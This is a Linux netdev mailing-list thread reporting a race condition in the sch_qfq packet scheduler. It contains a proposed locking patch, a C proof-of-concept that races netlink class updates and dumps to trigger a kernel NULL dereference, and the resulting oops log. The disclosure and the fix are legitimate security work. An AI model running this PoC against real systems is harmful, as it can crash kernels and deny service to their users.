netdev.vger.kernel.org archive mirror
 help / color / mirror / Atom feed
* Re: sch_qfq: race conditon on qfq_aggregate (net/sched/sch_qfq.c)
       [not found] <CAPpSM+SKOj9U8g_QsGp8M45dtEwvX4B_xdd7C0mP9pYu1b4mzA@mail.gmail.com>
@ 2025-06-29 14:28 ` Jamal Hadi Salim
  2025-06-30  3:11   ` Xiang Mei
  0 siblings, 1 reply; 26+ messages in thread
From: Jamal Hadi Salim @ 2025-06-29 14:28 UTC (permalink / raw)
  To: Xiang Mei; +Cc: security, Linux Kernel Network Developers, Cong Wang

On Sun, Jun 29, 2025 at 3:13 AM Xiang Mei <xmei5@asu.edu> wrote:
>
> Linux Kernel Security Team,
>
> We are writing to bring to your attention a race condition vulnerability in net/sched/sch_qfq.c.
>
> In function qfq_delete_class, the line `qfq_destroy_class(sch, cl);` is outside the protection of ` sch_tree_lock`, so any operation on agg could lead to a race condition vulnerability. For example, we can get a UAF by racing it with qfq_change_agg in qfq_enqueue.
>
> We verified it on v6.6.94 and exploited it in kernelCTF cos-109-17800.519.32.
> A temporal fix could be
> ```c
> @@ -558,10 +562,9 @@ static int qfq_delete_class(struct Qdisc *sch, unsigned long arg,
>
>  qdisc_purge_queue(cl->qdisc);
>  qdisc_class_hash_remove(&q->clhash, &cl->common);
> -
> +        qfq_destroy_class(sch, cl);
>  sch_tree_unlock(sch);
>
> -       qfq_destroy_class(sch, cl);
>  return 0;
>  }
> ```
>
> But this only avoids the exploitation. There are other places to exploit the vulnerability with a General Protection (usually null-deref). We found two places that can crash the kernel:
>
> 1. When modifying an existing class in  qfq_change_class, the reads of cl->agg->weight or cl->agg->lmax could lead to GPs.
> 2. Reads of agg content in qfq_dump_class could lead to GPs.
>
> These reads of the agg structure may require `RCU` or `lock` to protect.
>
> Looking forward to hearing from you and discussing the patching.
>


Please partake in the discussion to fix this, your other issue and
others on the netdev list, start with this thread:
https://lore.kernel.org/netdev/aF847kk6H+kr5kIV@pop-os.localdomain/

cheers,
jamal


> Thanks,
> Xiang Mei

^ permalink raw reply	[flat|nested] 26+ messages in thread

* Re: sch_qfq: race conditon on qfq_aggregate (net/sched/sch_qfq.c)
  2025-06-29 14:28 ` sch_qfq: race conditon on qfq_aggregate (net/sched/sch_qfq.c) Jamal Hadi Salim
@ 2025-06-30  3:11   ` Xiang Mei
  2025-06-30 11:36     ` Jamal Hadi Salim
  0 siblings, 1 reply; 26+ messages in thread
From: Xiang Mei @ 2025-06-30  3:11 UTC (permalink / raw)
  To: Jamal Hadi Salim; +Cc: security, Linux Kernel Network Developers, Cong Wang

On Sun, Jun 29, 2025 at 10:28:12AM -0400, Jamal Hadi Salim wrote:
> On Sun, Jun 29, 2025 at 3:13 AM Xiang Mei <xmei5@asu.edu> wrote:
> >
> > Linux Kernel Security Team,
> >
> > We are writing to bring to your attention a race condition vulnerability in net/sched/sch_qfq.c.
> >
> > In function qfq_delete_class, the line `qfq_destroy_class(sch, cl);` is outside the protection of ` sch_tree_lock`, so any operation on agg could lead to a race condition vulnerability. For example, we can get a UAF by racing it with qfq_change_agg in qfq_enqueue.
> >
> > We verified it on v6.6.94 and exploited it in kernelCTF cos-109-17800.519.32.
> > A temporal fix could be
> > ```c
> > @@ -558,10 +562,9 @@ static int qfq_delete_class(struct Qdisc *sch, unsigned long arg,
> >
> >  qdisc_purge_queue(cl->qdisc);
> >  qdisc_class_hash_remove(&q->clhash, &cl->common);
> > -
> > +        qfq_destroy_class(sch, cl);
> >  sch_tree_unlock(sch);
> >
> > -       qfq_destroy_class(sch, cl);
> >  return 0;
> >  }
> > ```
> >
> > But this only avoids the exploitation. There are other places to exploit the vulnerability with a General Protection (usually null-deref). We found two places that can crash the kernel:
> >
> > 1. When modifying an existing class in  qfq_change_class, the reads of cl->agg->weight or cl->agg->lmax could lead to GPs.
> > 2. Reads of agg content in qfq_dump_class could lead to GPs.
> >
> > These reads of the agg structure may require `RCU` or `lock` to protect.
> >
> > Looking forward to hearing from you and discussing the patching.
> >
> 
> 
> Please partake in the discussion to fix this, your other issue and
> others on the netdev list, start with this thread:
> https://lore.kernel.org/netdev/aF847kk6H+kr5kIV@pop-os.localdomain/

Thanks so much for your time and the helpful information.

Here is a potential patch to this vulnerability:

sch_lock was used to protect the read/write options of aggs. The 
lock may influence the performance of the scheduler, and RCU could also               
be a patch option.

```
From e64c4f5d662dc3f3c5dedf4b755a151d826d7f70 Mon Sep 17 00:00:00 2001
From: n132 <xmei5@asu.edu>
Date: Sun, 29 Jun 2025 16:26:43 -0700
Subject: [PATCH] net/sched: sch_qfq: Fix qfq_aggregate race condition

Apply sch_lock when reading or modifying agg data to prevent race conditions between class options and enqueue.
---
 net/sched/sch_qfq.c | 30 +++++++++++++++++++++---------
 1 file changed, 21 insertions(+), 9 deletions(-)

diff --git a/net/sched/sch_qfq.c b/net/sched/sch_qfq.c
index bf1282cb22eb..dc77ffc01bb3 100644
--- a/net/sched/sch_qfq.c
+++ b/net/sched/sch_qfq.c
@@ -412,7 +412,7 @@ static int qfq_change_class(struct Qdisc *sch, u32 classid, u32 parentid,
 	bool existing = false;
 	struct nlattr *tb[TCA_QFQ_MAX + 1];
 	struct qfq_aggregate *new_agg = NULL;
-	u32 weight, lmax, inv_w;
+	u32 weight, lmax, inv_w, old_weight, old_lmax;
 	int err;
 	int delta_w;
 
@@ -443,12 +443,16 @@ static int qfq_change_class(struct Qdisc *sch, u32 classid, u32 parentid,
 	inv_w = ONE_FP / weight;
 	weight = ONE_FP / inv_w;
 
-	if (cl != NULL &&
-	   lmax == cl->agg->lmax &&
-	   weight == cl->agg->class_weight)
-		return 0; /* nothing to change */
+	if(cl != NULL){
+		sch_tree_lock(sch);
+		old_weight = cl->agg->class_weight;
+		old_lmax   = cl->agg->lmax;
+		sch_tree_unlock(sch);
+		if (lmax == old_lmax && weight == old_weight)
+			return 0; /* nothing to change */
+	}
 
-	delta_w = weight - (cl ? cl->agg->class_weight : 0);
+	delta_w = weight - (cl ? old_weight : 0);
 
 	if (q->wsum + delta_w > QFQ_MAX_WSUM) {
 		NL_SET_ERR_MSG_FMT_MOD(extack,
@@ -555,10 +559,10 @@ static int qfq_delete_class(struct Qdisc *sch, unsigned long arg,
 
 	qdisc_purge_queue(cl->qdisc);
 	qdisc_class_hash_remove(&q->clhash, &cl->common);
+	qfq_destroy_class(sch, cl);
 
 	sch_tree_unlock(sch);
 
-	qfq_destroy_class(sch, cl);
 	return 0;
 }
 
@@ -625,6 +629,8 @@ static int qfq_dump_class(struct Qdisc *sch, unsigned long arg,
 {
 	struct qfq_class *cl = (struct qfq_class *)arg;
 	struct nlattr *nest;
+	u32 class_weight;
+	u32 lmax;
 
 	tcm->tcm_parent	= TC_H_ROOT;
 	tcm->tcm_handle	= cl->common.classid;
@@ -633,8 +639,12 @@ static int qfq_dump_class(struct Qdisc *sch, unsigned long arg,
 	nest = nla_nest_start_noflag(skb, TCA_OPTIONS);
 	if (nest == NULL)
 		goto nla_put_failure;
-	if (nla_put_u32(skb, TCA_QFQ_WEIGHT, cl->agg->class_weight) ||
-	   nla_put_u32(skb, TCA_QFQ_LMAX, cl->agg->lmax))
+	sch_tree_lock(sch);
+	class_weight = cl->agg->class_weight;
+	lmax         = cl->agg->lmax;
+	sch_tree_unlock(sch);
+	if (nla_put_u32(skb, TCA_QFQ_WEIGHT, class_weight) ||
+	   nla_put_u32(skb, TCA_QFQ_LMAX, lmax))
 		goto nla_put_failure;
 	return nla_nest_end(skb, nest);
 
@@ -651,8 +661,10 @@ static int qfq_dump_class_stats(struct Qdisc *sch, unsigned long arg,
 
 	memset(&xstats, 0, sizeof(xstats));
 
+	sch_tree_lock(sch);
 	xstats.weight = cl->agg->class_weight;
 	xstats.lmax = cl->agg->lmax;
+	sch_tree_unlock(sch);
 
 	if (gnet_stats_copy_basic(d, NULL, &cl->bstats, true) < 0 ||
 	   gnet_stats_copy_rate_est(d, &cl->rate_est) < 0 ||
-- 
2.43.0
```

Here is the PoC triggering the race condition for your reference:

```c
#include <stdio.h>
#include <sys/socket.h>
#include <linux/rtnetlink.h>
#include <linux/pkt_sched.h>
#include <linux/if_arp.h>
struct tf_msg {
    struct nlmsghdr nlh;
    struct tcmsg tcm;
#define TC_DATA_LEN 0x200
    char attrbuf[TC_DATA_LEN];
};
struct if_msg {
    struct nlmsghdr nlh;
    struct ifinfomsg ifi;
};
typedef unsigned int u32;
int nl, inet_sock_fd;
char *  msgQdiscCreate;
char *  tclass_0x20001_create;
char *  tclass_0x20002_create;
char *  tclass_0x20001_reset;

unsigned short add_rtattr (unsigned long rta_addr, unsigned short type, unsigned short len, char *data) {
    struct rtattr *rta = (struct rtattr *)rta_addr;
    rta->rta_type = type;
    rta->rta_len = RTA_LENGTH(len);
    memcpy(RTA_DATA(rta), data, len);
    return rta->rta_len;
}
int initNL(){
    struct if_msg if_up_msg = {
        {
            .nlmsg_len = 32,
            .nlmsg_type = RTM_NEWLINK,
            .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK,
        },
        {
            .ifi_family = AF_UNSPEC,
            .ifi_type = ARPHRD_NETROM,
            .ifi_index = 1,
            .ifi_flags = IFF_UP,
            .ifi_change = 1,
        },
    };
    int nl_sock_fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
    if_up_msg.ifi.ifi_index = if_nametoindex("lo");
    NLMsgSend(nl_sock_fd, (struct tf_msg *)(&if_up_msg));
    return nl_sock_fd;
}
void NLMsgSend (int sock, struct tf_msg *m) {
    struct {
        struct nlmsghdr nh;
        struct nlmsgerr ne;
    } ack;
    write(sock, m, m->nlh.nlmsg_len);
    read(sock , &ack, sizeof(ack));
}
/* Prepared Values*/
void init_loopbacksend (u32 prio) {
    struct sockaddr iaddr = { AF_INET };
    inet_sock_fd = socket(PF_INET, SOCK_DGRAM, 0);
    int res = setsockopt(inet_sock_fd, SOL_SOCKET, SO_PRIORITY, &prio, sizeof(prio));
    connect(inet_sock_fd, &iaddr, sizeof(iaddr));
}

/* Trafic control for netlink */
void init_tf_msg (struct tf_msg *m) {
    m->nlh.nlmsg_len    = NLMSG_LENGTH(sizeof(m->tcm));
    m->nlh.nlmsg_type   = 0;    // Default Value
    m->nlh.nlmsg_flags  = NLM_F_REQUEST | NLM_F_ACK; 
    m->nlh.nlmsg_seq    = 0;    // Default Value
    m->nlh.nlmsg_pid    = 0;    // Default Value

    // tcmsg
    m->tcm.tcm_family   = PF_UNSPEC;
    m->tcm.tcm_ifindex  = if_nametoindex("lo");
    m->tcm.tcm_handle   = 0;    // Default Value
    m->tcm.tcm_parent   = -1;   // Default Value for no parent
    m->tcm.tcm_info     = 0;    // Default Value
}

struct tf_msg * classGet(u32 classid){
    struct tf_msg *m = calloc(1,sizeof(struct tf_msg));
    init_tf_msg(m);
    m->nlh.nlmsg_type        = RTM_GETTCLASS;
    m->tcm.tcm_handle        = classid;
    return m;
}
struct tf_msg * qfqQdiscAdd(u32 handle, u32 parent) {
    struct tf_msg *m = calloc(1,sizeof(struct tf_msg));
    init_tf_msg(m);
    m->nlh.nlmsg_type    = RTM_NEWQDISC;     
    m->nlh.nlmsg_flags   |= NLM_F_CREATE;
    m->tcm.tcm_handle    = handle;
    m->tcm.tcm_parent    = parent;
    m->nlh.nlmsg_len     += NLMSG_ALIGN(add_rtattr((size_t)m + NLMSG_ALIGN(m->nlh.nlmsg_len), TCA_KIND, strlen("qfq") + 1, "qfq"));
    return m;
}
struct tf_msg * qfqClassAdd(int type, u32 classid,u32 val){
    struct tf_msg *m = calloc(1,sizeof(struct tf_msg));
    init_tf_msg(m);
    m->nlh.nlmsg_type       = RTM_NEWTCLASS;
    m->tcm.tcm_parent       = 0;
    m->tcm.tcm_handle       = classid;
    m->nlh.nlmsg_flags      |= NLM_F_CREATE;
    m->nlh.nlmsg_len        += NLMSG_ALIGN(add_rtattr((size_t)m + NLMSG_ALIGN(m->nlh.nlmsg_len), TCA_KIND, strlen("qfq") + 1, "qfq"));
    
    struct rtattr *opts     = (struct rtattr *)((size_t)m + NLMSG_ALIGN(m->nlh.nlmsg_len));
    opts->rta_type          = TCA_OPTIONS;
    opts->rta_len           = RTA_LENGTH(0);
    
    if(type == TCA_QFQ_LMAX)
        opts->rta_len += RTA_ALIGN(add_rtattr((size_t)opts + opts->rta_len, TCA_QFQ_LMAX, sizeof(val), (char *)&val));
    else if(type == TCA_QFQ_WEIGHT)
        opts->rta_len += RTA_ALIGN(add_rtattr((size_t)opts + opts->rta_len, TCA_QFQ_WEIGHT, sizeof(val), (char *)&val));
    m->nlh.nlmsg_len += NLMSG_ALIGN(opts->rta_len);
    return m;
}
void initContext(){
    msgQdiscCreate =        qfqQdiscAdd(0x20000,-1);
    tclass_0x20001_reset  = tclass_0x20001_create = qfqClassAdd(TCA_QFQ_LMAX,0x20001,0x200);
    tclass_0x20002_create = qfqClassAdd(TCA_QFQ_LMAX,0x20002,0x400);   
}
int main(){
    initContext();
    nl = initNL();
    NLMsgSend(nl,msgQdiscCreate);
    NLMsgSend(nl,tclass_0x20001_create);
    NLMsgSend(nl,tclass_0x20002_create);
    init_loopbacksend(0x20001);
    if(fork()){
        while(1){
            write(inet_sock_fd, "", 0x400-42); // upgrade
            NLMsgSend(nl,tclass_0x20001_reset);
        }
    }else{
        char * pay = classGet(0x20001);
        while(1)
            NLMsgSend(nl,pay);
    }
}

/*
[    1.078863] BUG: kernel NULL pointer dereference, address: 0000000000000028
[    1.079284] #PF: supervisor read access in kernel mode
[    1.079580] #PF: error_code(0x0000) - not-present page
[    1.079882] PGD 101e10067 P4D 101e10067 PUD 101e11067 PMD 0 
[    1.080211] Oops: 0000 [#1] PREEMPT SMP NOPTI
[    1.080466] CPU: 1 PID: 117 Comm: exploit Not tainted 6.6.94 #1
[    1.080873] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[    1.081426] RIP: 0010:qfq_dump_class+0x7f/0x120
[    1.081700] Code: 2b 95 ff 85 c0 0f 88 a3 00 00 00 4d 85 e4 0f 84 9a 00 00 00 48 8b 45 68 48 8d 4c 24 04 ba 04 00 00 00 48 89 df be 01 00 00 00 <8b> 40 28 89 44 24 04 e8 c5 2b 95 ff 85 c0 75 5b 48 8b 45 68 48 8d
[    1.082747] RSP: 0018:ffffc900004975b0 EFLAGS: 00010282
[    1.083050] RAX: 0000000000000000 RBX: ffff8881013e7100 RCX: ffffc900004975b4
[    1.083447] RDX: 0000000000000004 RSI: 0000000000000001 RDI: ffff8881013e7100
[    1.083846] RBP: ffff888100b90380 R08: 0000000000000014 R09: ffff88810177e030
[    1.084238] R10: 00000000000381a0 R11: ffff888101fd8000 R12: ffff88810177e02c
[    1.084645] R13: ffff88810177e000 R14: ffffffff82d662a0 R15: ffff888101fd8000
[    1.085072] FS:  00000000198fe3c0(0000) GS:ffff88811c500000(0000) knlGS:0000000000000000
[    1.085557] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    1.085888] CR2: 0000000000000028 CR3: 000000010168e000 CR4: 0000000000750ee0
[    1.086329] PKRU: 55555554
[    1.086491] Call Trace:
[    1.086645]  <TASK>
[    1.086777]  tc_fill_tclass+0x145/0x240
[    1.087008]  tclass_notify.constprop.0+0x6a/0xd0
[    1.087275]  tc_ctl_tclass+0x3bc/0x5a0
[    1.087496]  rtnetlink_rcv_msg+0x14e/0x3d0
[    1.087734]  ? kmem_cache_alloc_node+0x4b/0x520
[    1.088011]  ? __pfx_rtnetlink_rcv_msg+0x10/0x10
[    1.088281]  netlink_rcv_skb+0x57/0x100
[    1.088506]  netlink_unicast+0x247/0x390
[    1.088733]  netlink_sendmsg+0x250/0x4d0
[    1.088964]  sock_write_iter+0x199/0x1a0
[    1.089192]  vfs_write+0x393/0x440
[    1.089396]  ksys_write+0xb7/0xf0
[    1.089591]  do_syscall_64+0x5e/0x90
[    1.089801]  ? do_syscall_64+0x6a/0x90
[    1.090022]  ? netlink_rcv_skb+0x84/0x100
[    1.090254]  ? kmem_cache_free+0x1e/0x360
[    1.090484]  ? kmem_cache_free+0x1e/0x360
[    1.090713]  ? netlink_unicast+0x252/0x390
[    1.090953]  ? netlink_sendmsg+0x25d/0x4d0
[    1.091189]  ? sock_write_iter+0x199/0x1a0
[    1.091425]  ? vfs_write+0x393/0x440
[    1.091633]  ? exit_to_user_mode_prepare+0x1a/0x150
[    1.091915]  ? syscall_exit_to_user_mode+0x27/0x40
[    1.092190]  ? do_syscall_64+0x6a/0x90
[    1.092407]  ? exit_to_user_mode_prepare+0x1a/0x150
[    1.092686]  ? syscall_exit_to_user_mode+0x27/0x40
[    1.092962]  ? do_syscall_64+0x6a/0x90
[    1.093180]  ? do_syscall_64+0x6a/0x90
[    1.093397]  ? clear_bhb_loop+0x60/0xb0
[    1.093620]  ? clear_bhb_loop+0x60/0xb0
[    1.093842]  ? clear_bhb_loop+0x60/0xb0
[    1.094066]  ? clear_bhb_loop+0x60/0xb0
[    1.094287]  ? clear_bhb_loop+0x60/0xb0
[    1.094508]  entry_SYSCALL_64_after_hwframe+0x78/0xe2
*/
```

> 
> cheers,
> jamal
> 
> 
> > Thanks,
> > Xiang Mei

^ permalink raw reply related	[flat|nested] 26+ messages in thread

* Re: sch_qfq: race conditon on qfq_aggregate (net/sched/sch_qfq.c)
  2025-06-30  3:11   ` Xiang Mei
@ 2025-06-30 11:36     ` Jamal Hadi Salim
  2025-06-30 18:49       ` Xiang Mei
  0 siblings, 1 reply; 26+ messages in thread
From: Jamal Hadi Salim @ 2025-06-30 11:36 UTC (permalink / raw)
  To: Xiang Mei; +Cc: security, Linux Kernel Network Developers, Cong Wang

On Sun, Jun 29, 2025 at 11:11 PM Xiang Mei <xmei5@asu.edu> wrote:
>
> On Sun, Jun 29, 2025 at 10:28:12AM -0400, Jamal Hadi Salim wrote:
> > On Sun, Jun 29, 2025 at 3:13 AM Xiang Mei <xmei5@asu.edu> wrote:
> > >
> > > Linux Kernel Security Team,
> > >
> > > We are writing to bring to your attention a race condition vulnerability in net/sched/sch_qfq.c.
> > >
> > > In function qfq_delete_class, the line `qfq_destroy_class(sch, cl);` is outside the protection of ` sch_tree_lock`, so any operation on agg could lead to a race condition vulnerability. For example, we can get a UAF by racing it with qfq_change_agg in qfq_enqueue.
> > >
> > > We verified it on v6.6.94 and exploited it in kernelCTF cos-109-17800.519.32.
> > > A temporal fix could be
> > > ```c
> > > @@ -558,10 +562,9 @@ static int qfq_delete_class(struct Qdisc *sch, unsigned long arg,
> > >
> > >  qdisc_purge_queue(cl->qdisc);
> > >  qdisc_class_hash_remove(&q->clhash, &cl->common);
> > > -
> > > +        qfq_destroy_class(sch, cl);
> > >  sch_tree_unlock(sch);
> > >
> > > -       qfq_destroy_class(sch, cl);
> > >  return 0;
> > >  }
> > > ```
> > >
> > > But this only avoids the exploitation. There are other places to exploit the vulnerability with a General Protection (usually null-deref). We found two places that can crash the kernel:
> > >
> > > 1. When modifying an existing class in  qfq_change_class, the reads of cl->agg->weight or cl->agg->lmax could lead to GPs.
> > > 2. Reads of agg content in qfq_dump_class could lead to GPs.
> > >
> > > These reads of the agg structure may require `RCU` or `lock` to protect.
> > >
> > > Looking forward to hearing from you and discussing the patching.
> > >
> >
> >
> > Please partake in the discussion to fix this, your other issue and
> > others on the netdev list, start with this thread:
> > https://lore.kernel.org/netdev/aF847kk6H+kr5kIV@pop-os.localdomain/
>
> Thanks so much for your time and the helpful information.
>
> Here is a potential patch to this vulnerability:
>
> sch_lock was used to protect the read/write options of aggs. The
> lock may influence the performance of the scheduler, and RCU could also
> be a patch option.
>


I did test your earlier repro and could not create the issue. I dont
have time right now, but are you sure this new repro can create the
issue?

cheers,
jamal

> ```
> From e64c4f5d662dc3f3c5dedf4b755a151d826d7f70 Mon Sep 17 00:00:00 2001
> From: n132 <xmei5@asu.edu>
> Date: Sun, 29 Jun 2025 16:26:43 -0700
> Subject: [PATCH] net/sched: sch_qfq: Fix qfq_aggregate race condition
>
> Apply sch_lock when reading or modifying agg data to prevent race conditions between class options and enqueue.
> ---
>  net/sched/sch_qfq.c | 30 +++++++++++++++++++++---------
>  1 file changed, 21 insertions(+), 9 deletions(-)
>
> diff --git a/net/sched/sch_qfq.c b/net/sched/sch_qfq.c
> index bf1282cb22eb..dc77ffc01bb3 100644
> --- a/net/sched/sch_qfq.c
> +++ b/net/sched/sch_qfq.c
> @@ -412,7 +412,7 @@ static int qfq_change_class(struct Qdisc *sch, u32 classid, u32 parentid,
>         bool existing = false;
>         struct nlattr *tb[TCA_QFQ_MAX + 1];
>         struct qfq_aggregate *new_agg = NULL;
> -       u32 weight, lmax, inv_w;
> +       u32 weight, lmax, inv_w, old_weight, old_lmax;
>         int err;
>         int delta_w;
>
> @@ -443,12 +443,16 @@ static int qfq_change_class(struct Qdisc *sch, u32 classid, u32 parentid,
>         inv_w = ONE_FP / weight;
>         weight = ONE_FP / inv_w;
>
> -       if (cl != NULL &&
> -          lmax == cl->agg->lmax &&
> -          weight == cl->agg->class_weight)
> -               return 0; /* nothing to change */
> +       if(cl != NULL){
> +               sch_tree_lock(sch);
> +               old_weight = cl->agg->class_weight;
> +               old_lmax   = cl->agg->lmax;
> +               sch_tree_unlock(sch);
> +               if (lmax == old_lmax && weight == old_weight)
> +                       return 0; /* nothing to change */
> +       }
>
> -       delta_w = weight - (cl ? cl->agg->class_weight : 0);
> +       delta_w = weight - (cl ? old_weight : 0);
>
>         if (q->wsum + delta_w > QFQ_MAX_WSUM) {
>                 NL_SET_ERR_MSG_FMT_MOD(extack,
> @@ -555,10 +559,10 @@ static int qfq_delete_class(struct Qdisc *sch, unsigned long arg,
>
>         qdisc_purge_queue(cl->qdisc);
>         qdisc_class_hash_remove(&q->clhash, &cl->common);
> +       qfq_destroy_class(sch, cl);
>
>         sch_tree_unlock(sch);
>
> -       qfq_destroy_class(sch, cl);
>         return 0;
>  }
>
> @@ -625,6 +629,8 @@ static int qfq_dump_class(struct Qdisc *sch, unsigned long arg,
>  {
>         struct qfq_class *cl = (struct qfq_class *)arg;
>         struct nlattr *nest;
> +       u32 class_weight;
> +       u32 lmax;
>
>         tcm->tcm_parent = TC_H_ROOT;
>         tcm->tcm_handle = cl->common.classid;
> @@ -633,8 +639,12 @@ static int qfq_dump_class(struct Qdisc *sch, unsigned long arg,
>         nest = nla_nest_start_noflag(skb, TCA_OPTIONS);
>         if (nest == NULL)
>                 goto nla_put_failure;
> -       if (nla_put_u32(skb, TCA_QFQ_WEIGHT, cl->agg->class_weight) ||
> -          nla_put_u32(skb, TCA_QFQ_LMAX, cl->agg->lmax))
> +       sch_tree_lock(sch);
> +       class_weight = cl->agg->class_weight;
> +       lmax         = cl->agg->lmax;
> +       sch_tree_unlock(sch);
> +       if (nla_put_u32(skb, TCA_QFQ_WEIGHT, class_weight) ||
> +          nla_put_u32(skb, TCA_QFQ_LMAX, lmax))
>                 goto nla_put_failure;
>         return nla_nest_end(skb, nest);
>
> @@ -651,8 +661,10 @@ static int qfq_dump_class_stats(struct Qdisc *sch, unsigned long arg,
>
>         memset(&xstats, 0, sizeof(xstats));
>
> +       sch_tree_lock(sch);
>         xstats.weight = cl->agg->class_weight;
>         xstats.lmax = cl->agg->lmax;
> +       sch_tree_unlock(sch);
>
>         if (gnet_stats_copy_basic(d, NULL, &cl->bstats, true) < 0 ||
>            gnet_stats_copy_rate_est(d, &cl->rate_est) < 0 ||
> --
> 2.43.0
> ```
>
> Here is the PoC triggering the race condition for your reference:
>
> ```c
> #include <stdio.h>
> #include <sys/socket.h>
> #include <linux/rtnetlink.h>
> #include <linux/pkt_sched.h>
> #include <linux/if_arp.h>
> struct tf_msg {
>     struct nlmsghdr nlh;
>     struct tcmsg tcm;
> #define TC_DATA_LEN 0x200
>     char attrbuf[TC_DATA_LEN];
> };
> struct if_msg {
>     struct nlmsghdr nlh;
>     struct ifinfomsg ifi;
> };
> typedef unsigned int u32;
> int nl, inet_sock_fd;
> char *  msgQdiscCreate;
> char *  tclass_0x20001_create;
> char *  tclass_0x20002_create;
> char *  tclass_0x20001_reset;
>
> unsigned short add_rtattr (unsigned long rta_addr, unsigned short type, unsigned short len, char *data) {
>     struct rtattr *rta = (struct rtattr *)rta_addr;
>     rta->rta_type = type;
>     rta->rta_len = RTA_LENGTH(len);
>     memcpy(RTA_DATA(rta), data, len);
>     return rta->rta_len;
> }
> int initNL(){
>     struct if_msg if_up_msg = {
>         {
>             .nlmsg_len = 32,
>             .nlmsg_type = RTM_NEWLINK,
>             .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK,
>         },
>         {
>             .ifi_family = AF_UNSPEC,
>             .ifi_type = ARPHRD_NETROM,
>             .ifi_index = 1,
>             .ifi_flags = IFF_UP,
>             .ifi_change = 1,
>         },
>     };
>     int nl_sock_fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
>     if_up_msg.ifi.ifi_index = if_nametoindex("lo");
>     NLMsgSend(nl_sock_fd, (struct tf_msg *)(&if_up_msg));
>     return nl_sock_fd;
> }
> void NLMsgSend (int sock, struct tf_msg *m) {
>     struct {
>         struct nlmsghdr nh;
>         struct nlmsgerr ne;
>     } ack;
>     write(sock, m, m->nlh.nlmsg_len);
>     read(sock , &ack, sizeof(ack));
> }
> /* Prepared Values*/
> void init_loopbacksend (u32 prio) {
>     struct sockaddr iaddr = { AF_INET };
>     inet_sock_fd = socket(PF_INET, SOCK_DGRAM, 0);
>     int res = setsockopt(inet_sock_fd, SOL_SOCKET, SO_PRIORITY, &prio, sizeof(prio));
>     connect(inet_sock_fd, &iaddr, sizeof(iaddr));
> }
>
> /* Trafic control for netlink */
> void init_tf_msg (struct tf_msg *m) {
>     m->nlh.nlmsg_len    = NLMSG_LENGTH(sizeof(m->tcm));
>     m->nlh.nlmsg_type   = 0;    // Default Value
>     m->nlh.nlmsg_flags  = NLM_F_REQUEST | NLM_F_ACK;
>     m->nlh.nlmsg_seq    = 0;    // Default Value
>     m->nlh.nlmsg_pid    = 0;    // Default Value
>
>     // tcmsg
>     m->tcm.tcm_family   = PF_UNSPEC;
>     m->tcm.tcm_ifindex  = if_nametoindex("lo");
>     m->tcm.tcm_handle   = 0;    // Default Value
>     m->tcm.tcm_parent   = -1;   // Default Value for no parent
>     m->tcm.tcm_info     = 0;    // Default Value
> }
>
> struct tf_msg * classGet(u32 classid){
>     struct tf_msg *m = calloc(1,sizeof(struct tf_msg));
>     init_tf_msg(m);
>     m->nlh.nlmsg_type        = RTM_GETTCLASS;
>     m->tcm.tcm_handle        = classid;
>     return m;
> }
> struct tf_msg * qfqQdiscAdd(u32 handle, u32 parent) {
>     struct tf_msg *m = calloc(1,sizeof(struct tf_msg));
>     init_tf_msg(m);
>     m->nlh.nlmsg_type    = RTM_NEWQDISC;
>     m->nlh.nlmsg_flags   |= NLM_F_CREATE;
>     m->tcm.tcm_handle    = handle;
>     m->tcm.tcm_parent    = parent;
>     m->nlh.nlmsg_len     += NLMSG_ALIGN(add_rtattr((size_t)m + NLMSG_ALIGN(m->nlh.nlmsg_len), TCA_KIND, strlen("qfq") + 1, "qfq"));
>     return m;
> }
> struct tf_msg * qfqClassAdd(int type, u32 classid,u32 val){
>     struct tf_msg *m = calloc(1,sizeof(struct tf_msg));
>     init_tf_msg(m);
>     m->nlh.nlmsg_type       = RTM_NEWTCLASS;
>     m->tcm.tcm_parent       = 0;
>     m->tcm.tcm_handle       = classid;
>     m->nlh.nlmsg_flags      |= NLM_F_CREATE;
>     m->nlh.nlmsg_len        += NLMSG_ALIGN(add_rtattr((size_t)m + NLMSG_ALIGN(m->nlh.nlmsg_len), TCA_KIND, strlen("qfq") + 1, "qfq"));
>
>     struct rtattr *opts     = (struct rtattr *)((size_t)m + NLMSG_ALIGN(m->nlh.nlmsg_len));
>     opts->rta_type          = TCA_OPTIONS;
>     opts->rta_len           = RTA_LENGTH(0);
>
>     if(type == TCA_QFQ_LMAX)
>         opts->rta_len += RTA_ALIGN(add_rtattr((size_t)opts + opts->rta_len, TCA_QFQ_LMAX, sizeof(val), (char *)&val));
>     else if(type == TCA_QFQ_WEIGHT)
>         opts->rta_len += RTA_ALIGN(add_rtattr((size_t)opts + opts->rta_len, TCA_QFQ_WEIGHT, sizeof(val), (char *)&val));
>     m->nlh.nlmsg_len += NLMSG_ALIGN(opts->rta_len);
>     return m;
> }
> void initContext(){
>     msgQdiscCreate =        qfqQdiscAdd(0x20000,-1);
>     tclass_0x20001_reset  = tclass_0x20001_create = qfqClassAdd(TCA_QFQ_LMAX,0x20001,0x200);
>     tclass_0x20002_create = qfqClassAdd(TCA_QFQ_LMAX,0x20002,0x400);
> }
> int main(){
>     initContext();
>     nl = initNL();
>     NLMsgSend(nl,msgQdiscCreate);
>     NLMsgSend(nl,tclass_0x20001_create);
>     NLMsgSend(nl,tclass_0x20002_create);
>     init_loopbacksend(0x20001);
>     if(fork()){
>         while(1){
>             write(inet_sock_fd, "", 0x400-42); // upgrade
>             NLMsgSend(nl,tclass_0x20001_reset);
>         }
>     }else{
>         char * pay = classGet(0x20001);
>         while(1)
>             NLMsgSend(nl,pay);
>     }
> }
>
> /*
> [    1.078863] BUG: kernel NULL pointer dereference, address: 0000000000000028
> [    1.079284] #PF: supervisor read access in kernel mode
> [    1.079580] #PF: error_code(0x0000) - not-present page
> [    1.079882] PGD 101e10067 P4D 101e10067 PUD 101e11067 PMD 0
> [    1.080211] Oops: 0000 [#1] PREEMPT SMP NOPTI
> [    1.080466] CPU: 1 PID: 117 Comm: exploit Not tainted 6.6.94 #1
> [    1.080873] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
